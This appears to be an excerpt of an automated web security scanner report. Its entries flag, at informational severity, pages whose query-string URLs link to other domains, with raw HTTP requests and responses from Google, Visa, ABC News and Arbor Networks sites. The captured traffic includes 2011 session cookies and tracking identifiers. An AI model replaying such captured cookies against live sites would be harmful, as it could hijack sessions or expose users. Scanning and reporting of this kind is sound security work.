<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/messaging.js"></script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
<div id="header">
       <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/logo_cobrand.gif" alt="Wachovia A Wells Fargo Company" id="logo" />
       <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script>
       <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/default_logotype.gif" alt="" id="subbrand" />
   </div>
...[SNIP]...
<li class="first" id="officelocator"><a href="https://www.wellsfargoadvisors.com/" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Office Locator</a>
...[SNIP]...
</script>

       
                               <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...
<noscript>
<img src="https://ad.doubleclick.net/activity;src=800562;type=addit712;cat=onlin441;ord=1;num=1?" width="1" height="1" border="0">
</noscript>
...[SNIP]...

16.38. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Thu, 03 Feb 2011 01:04:35 GMT
Date: Thu, 03 Feb 2011 01:04:35 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=hxPXxLpAy8e_; Path=/; HttpOnly
Set-Cookie: S=photos_html=xsjqoN-Y8hiPseWtNoq4Iw; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</style>
<link rel="stylesheet" type="text/css" href="http://lh4.ggpht.com/s/v/71.12/styles/lh.css" />
</head>
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="http://lh3.ggpht.com/s/v/71.12/script/lh_searchview.js"></script>
...[SNIP]...
</a> <a href="http://www.youtube.com/results?q=ges&hl=en&ie=UTF-8&tab=q1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/">
<img src="http://lh5.ggpht.com/s/v/71.12/img/logo/pwa-en_US.gif" id="lhid_logo" alt="Picasa Web Albums" /></a>
...[SNIP]...
<td id="lhid_trayhandle" class="gphoto-trayhandle
">
<img src="http://lh5.ggpht.com/s/v/71.12/img/transparent.gif" class="" id="lhid_trayhandle_icon" />
</td>
...[SNIP]...
</a> -
<a href="http://googlephotos.blogspot.com" target="_blank">Blog</a>
...[SNIP]...

16.39. https://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://picasaweb.google.com
Path:   /lh/view

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lh/view?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Thu, 03 Feb 2011 01:04:38 GMT
Date: Thu, 03 Feb 2011 01:04:38 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=2aBCuxRjaNZC; Path=/; Secure; HttpOnly
Set-Cookie: S=photos_html=GtgaoWVmRAXTeT2zIwDvTA; Domain=.google.com; Path=/; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</style>
<link rel="stylesheet" type="text/css" href="https://lh4.googleusercontent.com/s/v/71.12/styles/lh.css" />
</head>
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="https://lh3.googleusercontent.com/s/v/71.12/script/lh_searchview.js"></script>
...[SNIP]...
<a href="/">
<img src="https://lh5.googleusercontent.com/s/v/71.12/img/logo/pwa-en_US.gif" id="lhid_logo" alt="Picasa Web Albums" /></a>
...[SNIP]...
<td id="lhid_trayhandle" class="gphoto-trayhandle
">
<img src="https://lh5.googleusercontent.com/s/v/71.12/img/transparent.gif" class="" id="lhid_trayhandle_icon" />
</td>
...[SNIP]...

16.40. http://translate.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?q=bluefin+tuna&hl=en&tab=nT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:05 GMT
Expires: Thu, 03 Feb 2011 01:05:05 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=4bff4d54437788ae:TM=1296695105:LM=1296695105:S=iNsdrnyGtendpl99; expires=Sat, 02-Feb-2013 01:05:05 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=bluefin+tuna&hl=en&sa=N&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

16.41. http://translate.google.com/translate_t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /translate_t?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:03 GMT
Expires: Thu, 03 Feb 2011 01:05:03 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=a39db064d38079a5:TM=1296695103:LM=1296695103:S=zQ1Y4_naj9x-tBcC; expires=Sat, 02-Feb-2013 01:05:03 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

16.42. http://translate.google.com/translate_t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /translate_t?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:02 GMT
Expires: Thu, 03 Feb 2011 01:05:02 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=25ad30bb14812802:TM=1296695102:LM=1296695102:S=SmhVQvsJtj0-g9k_; expires=Sat, 02-Feb-2013 01:05:02 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&um=1&ie=UTF-8&hl=en&sa=N&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

16.43. http://usa.visa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?country=us&ep=v_gg_new&akamai=true HTTP/1.1
Host: usa.visa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 18 Jan 2011 22:19:37 GMT
Accept-Ranges: bytes
ETag: "8062a7ca5db7cb1:0"
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 21:58:59 GMT
Connection: close
Set-Cookie: visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000; expires=Wed, 1-Jan-2020 23:59:59 GMT; path=/; domain=.visa.com
Set-Cookie: visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; path=/; domain=.visa.com
P3P:
Content-Length: 10831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<noscript>
<iframe src="//redcated/iaction/avevao_SOmainFooterIFrame_10" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<li><a href="http://visa.via.infonow.net/usa_atm/">ATM Locator</a>
...[SNIP]...

16.44. http://video.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?q=bluefin+tuna&hl=en&tab=nv HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:05:07 GMT
Expires: Thu, 03 Feb 2011 01:05:07 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=3c5df06124ce089f:TM=1296695107:LM=1296695107:S=hW3T73JJFigD4fIy; expires=Sat, 02-Feb-2013 01:05:07 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...
</div><a class=gb2 href=http://www.youtube.com/?q=bluefin+tuna&hl=en&tab=v1 onclick=gbar.qs(this)>YouTube</a>
...[SNIP]...
<div class=div-footer>
<a href=http://googlevideo.blogspot.com/>Blog</a>
...[SNIP]...

16.45. http://webcache.googleusercontent.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webcache.googleusercontent.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=cache:efdVqbelowMJ:www.invisionpower.com/products/board/+ipboard+software&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com HTTP/1.1
Host: webcache.googleusercontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:05:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<base href="http://www.invisionpower.com/products/board/"><div style="margin:-1px -1px 0;padding:0;border:1px solid #999;background:#fff"><div style="margin:12px;padding:8px;border:1px solid #999;background:#ddd;font:13px arial,sans-serif;color:#000;font-weight:normal;text-align:left">This is Google&#39;s cache of <a href="http://www.invisionpower.com/products/board/" style="text-decoration:underline;color:#00c">http://www.invisionpower.com/products/board/</a>. It is a snapshot of the page as it appeared on Jan 29, 2011 23:48:04 GMT. The <a href="http://www.invisionpower.com/products/board/" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://www.google.com/intl/en/help/features_list.html#cached" style="text-decoration:underline;color:#00c">Learn more</a>
...[SNIP]...
<meta name='description' content='The industry leading forum software and community platform from Invision Power Services, IP.Board powers thousands of forums, large and small.' />
<link rel='canonical' href='http://www.invisionpower.com/products/board/index.php' />

       <link rel="stylesheet" type="text/css" media="screen" href="http://www.invisionpower.com/assets//css/general.css" />
       <link rel='stylesheet' type='text/css' media='screen' href='http://www.invisionpower.com/assets/css/ipb.css' />
       <script type='text/javascript'>
...[SNIP]...
</script>

       
<script type='text/javascript' src='http://www.invisionpower.com/assets//js/prototype.js'></script>
       <script type='text/javascript' src='http://www.invisionpower.com/assets//js/scriptaculous/effects.js'></script>
<script type='text/javascript' src='http://www.invisionpower.com/assets//js/scriptaculous/builder.js'></script>
       <script type='text/javascript' src='http://www.invisionpower.com/assets//js/ips.js'></script>
<script src="http://www.invisionpower.com/assets//js/cufon/cufon-yui.js" type="text/javascript"></script>
       <script src="http://www.invisionpower.com/assets//js/cufon/Myriad_Pro_Light_300.font.js" type="text/javascript"></script>
...[SNIP]...
<a href='#' onClick="return SnapABug.startLink();" id='live_chat_button'><img src='https://snapabug.appspot.com/statusImage?w=a8d3256f-fb8f-460e-8420-04950112337f&on=https://www.invisionpower.com/live_help_button.png&off=https://www.invisionpower.com/live_help_button_off.png'></a>
...[SNIP]...
<li class='active'>
                   <a href='http://www.invisionpower.com'>For Consumer</a>
...[SNIP]...
<li>
                   <a href='http://www.invisionpower.com/business'>For Enterprise</a>
...[SNIP]...
<div id='masthead'>
               <a href='http://www.invisionpower.com' title='IPS, Inc. Homepage' id='branding'><img src='http://www.invisionpower.com/assets//images/logo.png' alt='Logo' /></a>
...[SNIP]...
<div id='buy_now_wrap'><a href='http://www.invisionpower.com/store/' id='header_buy_now'>Buy Now</a>
...[SNIP]...
<li id='nav_products' class='selected'>
                       <a href='http://www.invisionpower.com/suite/' title="Community Software Suite">Community <b style="color:black;background-color:#a0ffff">
...[SNIP]...
<li><a href='http://www.invisionpower.com/suite/' title='Community Software Suite'>IPS Community Suite</a>
...[SNIP]...
<li><a href='http://www.invisionpower.com/products/' title='See all products'>Product Line-up</a>
...[SNIP]...
<li class='indent'><a href='http://www.invisionpower.com/products/board/' title='Forum Software'>IP.Board</a>
...[SNIP]...
<li class='indent'><a href='http://www.invisionpower.com/products/nexus/' title='Go to IP.Nexus'>IP.Nexus</a>
...[SNIP]...
<li class='indent'><a href='http://www.invisionpower.com/products/blog/' title='Go to IP.Blog'>IP.Blog</a>
...[SNIP]...
<li class='indent'><a href='http://www.invisionpower.com/products/gallery/' title='Go to IP.Gallery'>IP.Gallery</a>
...[SNIP]...
<li class='indent'><a href='http://www.invisionpower.com/products/content/' title='Go to IP.Content'>IP.Content</a>
...[SNIP]...
<li class='indent'><a href='http://www.invisionpower.com/products/chat/' title='Go to IP.Chat'>IP.Chat</a>
...[SNIP]...
<li class='indent'><a href='http://www.invisionpower.com/products/downloads/' title='Go to IP.Downloads'>IP.Downloads</a>
...[SNIP]...
<li class='sep'><a href='http://www.invisionpower.com/products/spammonitor/' title='Go to Spam Monitor'>Spam Monitoring</a>
...[SNIP]...
<li><a href='http://www.invisionpower.com/suite/iphone' title='Go to iPhone application'>iPhone Application</a>
...[SNIP]...
<li><a href='http://www.invisionpower.com/suite/convert.php' title='Convert to IPS software'>Convert to IPS</a>
...[SNIP]...
<li><a href='http://www.invisionpower.com/suite/requirements.php' title='Suite requiremenets'>Suite requirements</a>
...[SNIP]...
<li><a href='http://www.invisionpower.com/suite/demo.php' title='Try our products'>Try our suite free</a>
...[SNIP]...
<li><a href='http://www.invisionpower.com/hosting/' title='Go to standard packages'>Standard Packages</a>
...[SNIP]...
<li><a href='http://www.invisionpower.com/hosting/advanced.php' title='Go to Advanced packages'>Advanced Packages</a>
...[SNIP]...
<li><a href='http://community.invisionpower.com/resources/documentation/index.html' title='Documentation'> Documentation </a>
...[SNIP]...
<li><a href='http://community.invisionpower.com/index.php?app=ccs' title='Go to the resource site'>Resources</a>
...[SNIP]...
<li><a href='http://community.invisionpower.com' title='Our community support forums'>Support Forums</a>
...[SNIP]...
<li><a href='http://www.invisionpower.com/company/faq.php' title='Go to the FAQs'>FAQs</a>
...[SNIP]...
<li><a href='http://www.invisionpower.com/hosting/status.php' title=''>Network Status</a>
...[SNIP]...
<li id='nav_community'>
                       <a href='http://community.invisionpower.com/' title='Visit our own community'>Our Community</a>
...[SNIP]...
<li id='nav_contact'><a href='http://www.invisionpower.com/company/contact.php' title='Get in touch'>Contact Us &raquo;</a>
...[SNIP]...
<li class=""><a href='http://www.invisionpower.com/products/board/features/' title='See IP.Board features'>Features</a>
...[SNIP]...
<li class=""><a href='http://www.invisionpower.com/products/board/whats_new.php' title='See what's new in IP.Board 3'>What's New</a>
...[SNIP]...
<li><a href='http://www.invisionpower.com/suite/demo.php' title='Try IP.Board for free'>Try It Free</a>
...[SNIP]...
<div id='action'>
       <img class='right' src='http://www.invisionpower.com/assets//images/ipboard/ipboard_screenshot_footer.png' alt='' />
       <a href='http://www.invisionpower.com/store/' id='button_buy' class='button left'>Buy now</a>
...[SNIP]...
<br />
           Or get it as part of our <a href='http://www.invisionpower.com/hosting/' title='See our Hosted Community packages'>Hosted Community</a>
...[SNIP]...
<li class=''>
                   <img src='http://www.invisionpower.com/assets//images/ipboard/spotlight/spotlight_messenger.png' alt='' />
                   <h4>
...[SNIP]...
<li class=''>
                   <img src='http://www.invisionpower.com/assets//images/ipboard/spotlight/spotlight_reports.png' alt='' />
                   <span class='updated'>
...[SNIP]...
<li class=''>
                   <img src='http://www.invisionpower.com/assets//images/ipboard/spotlight/spotlight_polls.png' alt='' />
                   <h4>
...[SNIP]...
<li class='clear'>
                   <img src='http://www.invisionpower.com/assets//images/ipboard/spotlight/spotlight_rep.png' alt='' />
                   <span class='updated'>
...[SNIP]...
<li class=''>
                   <img src='http://www.invisionpower.com/assets//images/ipboard/spotlight/spotlight_status.png' alt='' />
                   <span class='updated'>
...[SNIP]...
<li class=''>
                   <img src='http://www.invisionpower.com/assets//images/ipboard/spotlight/spotlight_profile.png' alt='' />
                   <span class='updated'>
...[SNIP]...
</ul>
           <a href='http://www.invisionpower.com/products/board/features/' title='See more features' id='button_allfeatures'>See the complete feature list</a>
...[SNIP]...
<br />
               
               <a href='http://www.invisionpower.com/products/board/whats_new.php' title="See what's new in IP.Board 3.1" id='button_whatsnew'>See what's new</a>
...[SNIP]...
<li>
                   <img src='http://www.invisionpower.com/assets//images/icons/sitemap.png' alt='' class='left' />
                   <h3>
...[SNIP]...
<li>
                   <img src='http://www.invisionpower.com/assets//images/icons/balloon.png' alt='' class='left' />
                   <h3>
...[SNIP]...
<li>
                   <img src='http://www.invisionpower.com/assets//images/icons/exclamation.png' alt='' class='left' />
                   <h3>
...[SNIP]...
<li>
                   <img src='http://www.invisionpower.com/assets//images/icons/palette.png' alt='' class='left' />
                   <h3>
...[SNIP]...
<li>
                   <img src='http://www.invisionpower.com/assets//images/icons/lock.png' alt='' class='left' />
                   <h3>
...[SNIP]...
<li>
                   <img src='http://www.invisionpower.com/assets//images/icons/tools.png' alt='' class='left' />
                   <h3>
...[SNIP]...
<p style='text-align: center'>
           <a href='http://www.invisionpower.com/products/board/purchase.php' style='font-size: 15px; font-weight: bold' title='Compare licenses'>Compare these IP.Board licenses &rarr;</a>
...[SNIP]...
</b> updates, support, and our other <a href='http://www.invisionpower.com/suite/license_benefits.php' title='See the license benefits'>license benefits</a>. Customers can renew via the <a href='http://www.invisionpower.com/customer/' title='Go to the client area'>client area</a>
...[SNIP]...
<p class='buy_bar'>
           <a href='http://www.invisionpower.com/store/index.php?product=board' title='Buy Now' id='button_buynow' class='button'>Buy Now</a>
...[SNIP]...
<div id='footer_links'>
           <a href='http://www.invisionpower.com/legal/privacy.php'>Privacy Policy</a>
           <a href='http://www.invisionpower.com/company/standards.php'>Standards of Service</a>
           <a href='http://www.invisionpower.com/legal/hosting_policies.php'>Hosting Policies</a>
           <a href='http://community.invisionpower.com'>IPS Company Forums</a>
...[SNIP]...
</script>
<script id="pap_x2s6df8d" src="http://affiliate.invisionpower.com/scripts/clickjs.php" type="text/javascript">
</script>
...[SNIP]...

16.46. http://www.abc.net.au/news/stories/2011/01/20/3117032.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /news/stories/2011/01/20/3117032.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/stories/2011/01/20/3117032.htm?section=justin HTTP/1.1
Host: www.abc.net.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Cache-Control: max-age=300
Expires: Thu, 03 Feb 2011 01:10:09 GMT
Date: Thu, 03 Feb 2011 01:05:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ABCGuestID=24.143.206.110.73161296695109747; expires=Thu, 03-Feb-2011 01:35:09 GMT; path=/; domain=abc.net.au
Content-Length: 41425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
   <link rel="schema.DC" href="http://purl.org/dc/elements/1.1/" />
<link rel="schema.DCTERMS" href="http://purl.org/dc/terms/" />
<link rel="schema.ABC" href="http://metadataregistry.org/uri/abc/elements/" />
<link rel="schema.ABCTERMS" href="http://metadataregistry.org/uri/abc/terms/" />
<link rel="schema.iptc" href="urn:newsml:iptc.org:20031010:topicset.iptc-genre:8" />
...[SNIP]...
<li class="first">
                                       <a href="http://australianetworknews.com/">Australia Network News</a>
...[SNIP]...
<li>
                                       <a href="http://australianetwork.com/businesstoday/">Business Today</a>
...[SNIP]...
<li class="first">
                                       <a href="http://www.radioaustralianews.net.au/">Radio Australia News</a>
...[SNIP]...
<area shape="rect" coords="860,0,960,60" href="/landline/" alt="Landline" title="Landline" />
           <area shape="rect" coords="0,60,120,120" href="http://australianetworknews.com/" alt="Australia Network News" title="Australia Network News" />
           <area shape="rect" coords="120,60,250,120" href="http://www.radioaustralianews.net.au/" alt="Radio Australia News" title="Radio Australia News" />
           <area shape="rect" coords="250,60,340,120" href="/austory/" alt="Australian Story" title="Australian Story" />
           <area shape="rect" coords="340,60,475,120" href="http://australianetwork.com/businesstoday/" alt="Business Today" title="Business Today" />
           <area shape="rect" coords="475,60,525,120" href="/am/" alt="AM" title="AM" />
...[SNIP]...
<noscript>
       <img alt="" style="border:0;" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsg85fae000004n0vfjpj8oa_9m4q/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />
   </noscript>
...[SNIP]...

16.47. http://www.arbornetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_joomap&Itemid=487&id=32 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:46:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=5fb03c2fed5496781c30f42a91a9c17e; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:26 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:26 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:27 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:28 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 32006


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
</a><a href="https://arbor.custhelp.com/app/home" class="mainlevel">Customer Support Login</a>
...[SNIP]...
</script><a href="http://www.ko-ca.com" style="font-size:1px;display:none;">Software Entwicklung NRW</a>
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

16.48. http://www.arbornetworks.com/index.php  previous  next

